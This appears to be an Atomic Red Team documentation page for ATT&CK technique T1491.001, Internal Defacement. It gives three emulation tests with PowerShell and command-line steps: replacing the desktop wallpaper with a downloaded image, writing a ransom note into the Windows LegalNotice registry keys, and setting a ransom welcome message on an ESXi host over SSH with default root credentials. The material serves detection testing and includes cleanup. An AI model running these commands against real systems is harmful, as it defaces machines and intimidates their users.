Skip to content
Atomic Red Team
atomics
T1491.001

T1491.001 - Defacement: Internal Defacement

Description from ATT&CK (opens in a new tab)

An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users, thus discrediting the integrity of the systems. This may take the form of modifications to internal websites or server login messages, or directly to user systems with the replacement of the desktop wallpaper.(Citation: Novetta Blockbuster)(Citation: Varonis) Disturbing or offensive images may be used as a part of Internal Defacement (opens in a new tab) in order to cause user discomfort, or to pressure compliance with accompanying messages. Since internally defacing systems exposes an adversary's presence, it often takes place after other intrusion goals have been accomplished.(Citation: Novetta Blockbuster Destructive Malware)

Atomic Tests


Atomic Test #1 - Replace Desktop Wallpaper

Downloads an image from a URL and sets it as the desktop wallpaper.

Supported Platforms: Windows

auto_generated_guid: 30558d53-9d76-41c4-9267-a7bd5184bed3

Inputs:

NameDescriptionTypeDefault Value
url_of_wallpaperURL pointing to the image file you wish to set as wallpaperurlhttps://redcanary.com/wp-content/uploads/Atomic-Red-Team-Logo.png (opens in a new tab)
pointer_to_orginal_wallpaperFull path to where a file containing the original wallpaper location will be savedstring$env:TEMP\T1491.001-OrginalWallpaperLocation
wallpaper_locationFull path to where the downloaded wallpaper image will be savedstring$env:TEMP\T1491.001-newWallpaper.png

Attack Commands: Run with powershell!

$url = "#{url_of_wallpaper}"
$imgLocation = "#{wallpaper_location}"
$orgWallpaper = (Get-ItemProperty -Path Registry::'HKEY_CURRENT_USER\Control Panel\Desktop\' -Name WallPaper).WallPaper
$orgWallpaper | Out-File -FilePath "#{pointer_to_orginal_wallpaper}"
$updateWallpapercode = @' 
using System.Runtime.InteropServices; 
namespace Win32{
 
    public class Wallpaper{ 
        [DllImport("user32.dll", CharSet=CharSet.Auto)] 
         static extern int SystemParametersInfo (int uAction , int uParam , string lpvParam , int fuWinIni) ; 
         
         public static void SetWallpaper(string thePath){ 
            SystemParametersInfo(20,0,thePath,3); 
        }
    }
} 
'@
$wc = New-Object System.Net.WebClient  
try{  
    $wc.DownloadFile($url, $imgLocation)
    add-type $updateWallpapercode 
    [Win32.Wallpaper]::SetWallpaper($imgLocation)
} 
catch [System.Net.WebException]{  
    Write-Host("Cannot download $url") 
    add-type $updateWallpapercode 
    [Win32.Wallpaper]::SetWallpaper($imgLocation)
} 
finally{    
    $wc.Dispose()  
}

Cleanup Commands:

$updateWallpapercode = @' 
using System.Runtime.InteropServices; 
namespace Win32{
 
    public class Wallpaper{ 
        [DllImport("user32.dll", CharSet=CharSet.Auto)] 
         static extern int SystemParametersInfo (int uAction , int uParam , string lpvParam , int fuWinIni) ; 
         
         public static void SetWallpaper(string thePath){ 
            SystemParametersInfo(20,0,thePath,3); 
        }
    }
} 
'@
if (Test-Path -Path #{pointer_to_orginal_wallpaper} -PathType Leaf) {
     $orgImg = Get-Content -Path "#{pointer_to_orginal_wallpaper}"
     add-type $updateWallpapercode 
     [Win32.Wallpaper]::SetWallpaper($orgImg)
}
Remove-Item "#{pointer_to_orginal_wallpaper}" -ErrorAction Ignore
Remove-Item "#{wallpaper_location}" -ErrorAction Ignore


Atomic Test #2 - Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message

Display ransom message to users at system start-up by configuring registry keys HKLM\SOFTWARE\Micosoft\Windows\CurrentVersion\Policies\System\LegalNoticeCaption and HKLM\SOFTWARE\Micosoft\Windows\CurrentVersion\Policies\System\LegalNoticeText.

SynAck Ransomware (opens in a new tab), Grief Ransomware (opens in a new tab), Maze Ransomware (opens in a new tab), Pysa Ransomware (opens in a new tab), Spook Ransomware (opens in a new tab), DopplePaymer Ransomware (opens in a new tab), Reedemer Ransomware (opens in a new tab), Kangaroo Ransomware (opens in a new tab)

Supported Platforms: Windows

auto_generated_guid: ffcbfaab-c9ff-470b-928c-f086b326089b

Inputs:

NameDescriptionTypeDefault Value
legal_notice_captionTitle of ransom messagestringPYSA
legal_notice_textBody of ransom messagestringHi Company, every byte on any types of your devices was encrypted. Don't try to use backups because it were encrypted too. To get all your data contact us:xxxx@onionmail.org

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

$orgLegalNoticeCaption = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeCaption).LegalNoticeCaption
$orgLegalNoticeText = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeText).LegalNoticeText
$newLegalNoticeCaption = "#{legal_notice_caption}"
$newLegalNoticeText = "#{legal_notice_text}"
Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeCaption -Value $newLegalNoticeCaption -Type String -Force
Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeText -Value $newLegalNoticeText -Type String -Force

Cleanup Commands:

Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeCaption -Value $orgLegalNoticeCaption -Type String -Force
Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeText -Value $orgLegalNoticeText -Type String -Force


Atomic Test #3 - ESXi - Change Welcome Message on Direct Console User Interface (DCUI)

Changes the ESXi welcome message to potentially display ransom information. Reference (opens in a new tab)

Supported Platforms: Windows

auto_generated_guid: 30905f21-34f3-4504-8b4c-f7a5e314b810

Inputs:

NameDescriptionTypeDefault Value
vm_hostSpecify the host name or IP of the ESXi server.stringatomic.local
vm_userSpecify the privilege user account on the ESXi server.stringroot
vm_passSpecify the privileged user's password.stringpassword
plink_filePath to PlinkpathPathToAtomicsFolder\..\ExternalPayloads\plink.exe

Attack Commands: Run with command_prompt!

echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "esxcli system welcomemsg set -m 'RANSOMWARE-NOTIFICATION'"

Dependencies: Run with powershell!

Description: Check if we have plink
Check Prereq Commands:
if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"